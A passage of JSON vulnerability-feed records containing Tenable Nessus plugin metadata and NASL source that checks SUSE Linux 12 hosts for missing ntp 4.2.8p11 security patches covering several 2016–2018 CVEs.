"AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-01T06:46:20", "description": "This update for ntp fixes the following issues :\n\nUpdate to 4.2.8p11 (bsc#1082210) :\n\n - CVE-2016-1549: Sybil vulnerability: ephemeral\n association attack. 
While fixed in ntp-4.2.8p7, there\n are significant additional protections for this issue in\n 4.2.8p11.\n\n - CVE-2018-7182: ctl_getitem(): buffer read overrun leads\n to undefined behavior and information leak.\n (bsc#1083426)\n\n - CVE-2018-7170: Multiple authenticated ephemeral\n associations. (bsc#1083424)\n\n - CVE-2018-7184: Interleaved symmetric mode cannot recover\n from bad state. (bsc#1083422)\n\n - CVE-2018-7185: Unauthenticated packet can reset\n authenticated interleaved association. (bsc#1083420)\n\n - CVE-2018-7183: ntpq:decodearr() can write beyond its\n buffer limit.(bsc#1083417)\n\nDon't use libevent's cached time stamps in sntp. (bsc#1077445)\n\nThis update is a reissue of the previous update with LTSS channels\nincluded.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 22, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-10-22T00:00:00", "title": "SUSE SLES12 Security Update : ntp (SUSE-SU-2018:1765-2)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-7184", "CVE-2018-7185", "CVE-2018-7183", "CVE-2018-7170", "CVE-2016-1549", "CVE-2018-7182"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:ntp-doc", "p-cpe:/a:novell:suse_linux:ntp-debugsource", "p-cpe:/a:novell:suse_linux:ntp-debuginfo", "p-cpe:/a:novell:suse_linux:ntp"], "id": "SUSE_SU-2018-1765-2.NASL", "href": "https://www.tenable.com/plugins/nessus/118269", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:1765-2.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(118269);\n 
script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/09/10 13:51:48\");\n\n script_cve_id(\"CVE-2016-1549\", \"CVE-2018-7170\", \"CVE-2018-7182\", \"CVE-2018-7183\", \"CVE-2018-7184\", \"CVE-2018-7185\");\n\n script_name(english:\"SUSE SLES12 Security Update : ntp (SUSE-SU-2018:1765-2)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for ntp fixes the following issues :\n\nUpdate to 4.2.8p11 (bsc#1082210) :\n\n - CVE-2016-1549: Sybil vulnerability: ephemeral\n association attack. While fixed in ntp-4.2.8p7, there\n are significant additional protections for this issue in\n 4.2.8p11.\n\n - CVE-2018-7182: ctl_getitem(): buffer read overrun leads\n to undefined behavior and information leak.\n (bsc#1083426)\n\n - CVE-2018-7170: Multiple authenticated ephemeral\n associations. (bsc#1083424)\n\n - CVE-2018-7184: Interleaved symmetric mode cannot recover\n from bad state. (bsc#1083422)\n\n - CVE-2018-7185: Unauthenticated packet can reset\n authenticated interleaved association. (bsc#1083420)\n\n - CVE-2018-7183: ntpq:decodearr() can write beyond its\n buffer limit.(bsc#1083417)\n\nDon't use libevent's cached time stamps in sntp. (bsc#1077445)\n\nThis update is a reissue of the previous update with LTSS channels\nincluded.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1077445\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1082063\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1082210\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1083417\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1083420\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1083422\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1083424\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1083426\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-1549/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-7170/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-7182/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-7183/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-7184/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-7185/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20181765-2/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?df20509a\"\n );\n script_set_attribute(\n attribute:\"solution\", \n 
value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server 12-SP2-BCL:zypper in -t patch\nSUSE-SLE-SERVER-12-SP2-BCL-2018-1188=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ntp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ntp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ntp-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ntp-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/01/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/10/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! 
preg(pattern:\"^(2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP2\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"ntp-4.2.8p11-64.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"ntp-debuginfo-4.2.8p11-64.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"ntp-debugsource-4.2.8p11-64.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"ntp-doc-4.2.8p11-64.5.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ntp\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-01T06:46:19", "description": "This update for ntp fixes the following issues :\n\n - Update to 4.2.8p11 (bsc#1082210) :\n\n - CVE-2016-1549: Sybil vulnerability: ephemeral\n association attack. While fixed in ntp-4.2.8p7, there\n are significant additional protections for this issue in\n 4.2.8p11.\n\n - CVE-2018-7182: ctl_getitem(): buffer read overrun leads\n to undefined behavior and information leak.\n (bsc#1083426)\n\n - CVE-2018-7170: Multiple authenticated ephemeral\n associations. (bsc#1083424)\n\n - CVE-2018-7184: Interleaved symmetric mode cannot recover\n from bad state. (bsc#1083422)\n\n - CVE-2018-7185: Unauthenticated packet can reset\n authenticated interleaved association. 
(bsc#1083420)\n\n - CVE-2018-7183: ntpq:decodearr() can write beyond its\n buffer limit.(bsc#1083417)\n\n - Don't use libevent's cached time stamps in sntp.\n (bsc#1077445) This update is a reissue of the previous\n update with LTSS channels included.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 28, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-06-21T00:00:00", "title": "SUSE SLED12 / SLES12 Security Update : ntp (SUSE-SU-2018:1765-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-7184", "CVE-2018-7185", "CVE-2018-7183", "CVE-2018-7170", "CVE-2016-1549", "CVE-2018-7182"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:ntp-doc", "p-cpe:/a:novell:suse_linux:ntp-debugsource", "p-cpe:/a:novell:suse_linux:ntp-debuginfo", "p-cpe:/a:novell:suse_linux:ntp"], "id": "SUSE_SU-2018-1765-1.NASL", "href": "https://www.tenable.com/plugins/nessus/110639", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:1765-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110639);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/09/10 13:51:48\");\n\n script_cve_id(\"CVE-2016-1549\", \"CVE-2018-7170\", \"CVE-2018-7182\", \"CVE-2018-7183\", \"CVE-2018-7184\", \"CVE-2018-7185\");\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : ntp (SUSE-SU-2018:1765-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n 
);\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for ntp fixes the following issues :\n\n - Update to 4.2.8p11 (bsc#1082210) :\n\n - CVE-2016-1549: Sybil vulnerability: ephemeral\n association attack. While fixed in ntp-4.2.8p7, there\n are significant additional protections for this issue in\n 4.2.8p11.\n\n - CVE-2018-7182: ctl_getitem(): buffer read overrun leads\n to undefined behavior and information leak.\n (bsc#1083426)\n\n - CVE-2018-7170: Multiple authenticated ephemeral\n associations. (bsc#1083424)\n\n - CVE-2018-7184: Interleaved symmetric mode cannot recover\n from bad state. (bsc#1083422)\n\n - CVE-2018-7185: Unauthenticated packet can reset\n authenticated interleaved association. (bsc#1083420)\n\n - CVE-2018-7183: ntpq:decodearr() can write beyond its\n buffer limit.(bsc#1083417)\n\n - Don't use libevent's cached time stamps in sntp.\n (bsc#1077445) This update is a reissue of the previous\n update with LTSS channels included.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1077445\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1082063\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1082210\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1083417\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1083420\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1083422\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1083424\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1083426\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-1549/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-7170/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-7182/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-7183/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-7184/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-7185/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20181765-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?2c461920\"\n );\n script_set_attribute(\n attribute:\"solution\", \n 
value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE OpenStack Cloud 7:zypper in -t patch\nSUSE-OpenStack-Cloud-7-2018-1188=1\n\nSUSE Linux Enterprise Server for SAP 12-SP2:zypper in -t patch\nSUSE-SLE-SAP-12-SP2-2018-1188=1\n\nSUSE Linux Enterprise Server for SAP 12-SP1:zypper in -t patch\nSUSE-SLE-SAP-12-SP1-2018-1188=1\n\nSUSE Linux Enterprise Server 12-SP3:zypper in -t patch\nSUSE-SLE-SERVER-12-SP3-2018-1188=1\n\nSUSE Linux Enterprise Server 12-SP2-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-SP2-2018-1188=1\n\nSUSE Linux Enterprise Server 12-SP1-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-SP1-2018-1188=1\n\nSUSE Linux Enterprise Desktop 12-SP3:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP3-2018-1188=1\n\nSUSE Enterprise Storage 4:zypper in -t patch\nSUSE-Storage-4-2018-1188=1\n\nSUSE CaaS Platform ALL :\n\nTo install this update, use the SUSE CaaS Platform Velum dashboard. 
It\nwill inform you if it detects new updates and let you then trigger\nupdating of the complete cluster in a controlled way.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ntp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ntp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ntp-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ntp-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/01/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/06/21\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(1|2|3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP1/2/3\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! 
preg(pattern:\"^(3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP3\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"ntp-4.2.8p11-64.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"ntp-debuginfo-4.2.8p11-64.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"ntp-debugsource-4.2.8p11-64.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"ntp-doc-4.2.8p11-64.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"ntp-4.2.8p11-64.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"ntp-debuginfo-4.2.8p11-64.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"ntp-debugsource-4.2.8p11-64.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"ntp-doc-4.2.8p11-64.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"ntp-4.2.8p11-64.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"ntp-debuginfo-4.2.8p11-64.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"ntp-debugsource-4.2.8p11-64.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"ntp-doc-4.2.8p11-64.5.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"ntp-4.2.8p11-64.5.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"ntp-debuginfo-4.2.8p11-64.5.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"ntp-debugsource-4.2.8p11-64.5.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"ntp-doc-4.2.8p11-64.5.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ntp\");\n}\n", "cvss": 
{"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-01T06:44:45", "description": "This update for ntp fixes the following issues :\n\n - Update to 4.2.8p11 (bsc#1082210) :\n\n - CVE-2016-1549: Sybil vulnerability: ephemeral\n association attack. While fixed in ntp-4.2.8p7, there\n are significant additional protections for this issue in\n 4.2.8p11.\n\n - CVE-2018-7182: ctl_getitem(): buffer read overrun leads\n to undefined behavior and information leak.\n (bsc#1083426)\n\n - CVE-2018-7170: Multiple authenticated ephemeral\n associations. (bsc#1083424)\n\n - CVE-2018-7184: Interleaved symmetric mode cannot recover\n from bad state. (bsc#1083422)\n\n - CVE-2018-7185: Unauthenticated packet can reset\n authenticated interleaved association. (bsc#1083420)\n\n - CVE-2018-7183: ntpq:decodearr() can write beyond its\n buffer limit.(bsc#1083417)\n\n - Don't use libevent's cached time stamps in sntp.\n (bsc#1077445)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 28, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-04-17T00:00:00", "title": "SUSE SLED12 / SLES12 Security Update : ntp (SUSE-SU-2018:0956-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-7184", "CVE-2018-7185", "CVE-2018-7183", "CVE-2018-7170", "CVE-2016-1549", "CVE-2018-7182"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:ntp-doc", "p-cpe:/a:novell:suse_linux:ntp-debugsource", "p-cpe:/a:novell:suse_linux:ntp-debuginfo", "p-cpe:/a:novell:suse_linux:ntp"], "id": "SUSE_SU-2018-0956-1.NASL", "href": "https://www.tenable.com/plugins/nessus/109085", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:0956-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(109085);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/09/10 13:51:47\");\n\n script_cve_id(\"CVE-2016-1549\", \"CVE-2018-7170\", \"CVE-2018-7182\", \"CVE-2018-7183\", \"CVE-2018-7184\", \"CVE-2018-7185\");\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : ntp (SUSE-SU-2018:0956-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for ntp fixes the following issues :\n\n - Update to 4.2.8p11 (bsc#1082210) :\n\n - CVE-2016-1549: Sybil vulnerability: ephemeral\n association attack. 
While fixed in ntp-4.2.8p7, there\n are significant additional protections for this issue in\n 4.2.8p11.\n\n - CVE-2018-7182: ctl_getitem(): buffer read overrun leads\n to undefined behavior and information leak.\n (bsc#1083426)\n\n - CVE-2018-7170: Multiple authenticated ephemeral\n associations. (bsc#1083424)\n\n - CVE-2018-7184: Interleaved symmetric mode cannot recover\n from bad state. (bsc#1083422)\n\n - CVE-2018-7185: Unauthenticated packet can reset\n authenticated interleaved association. (bsc#1083420)\n\n - CVE-2018-7183: ntpq:decodearr() can write beyond its\n buffer limit.(bsc#1083417)\n\n - Don't use libevent's cached time stamps in sntp.\n (bsc#1077445)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1077445\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1082063\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1082210\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1083417\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1083420\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1083422\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1083424\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1083426\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-1549/\"\n );\n 
script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-7170/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-7182/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-7183/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-7184/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-7185/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20180956-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4d795c38\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server 12-SP3:zypper in -t patch\nSUSE-SLE-SERVER-12-SP3-2018-648=1\n\nSUSE Linux Enterprise Desktop 12-SP3:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP3-2018-648=1\n\nSUSE CaaS Platform ALL :\n\nTo install this update, use the SUSE CaaS Platform Velum dashboard. 
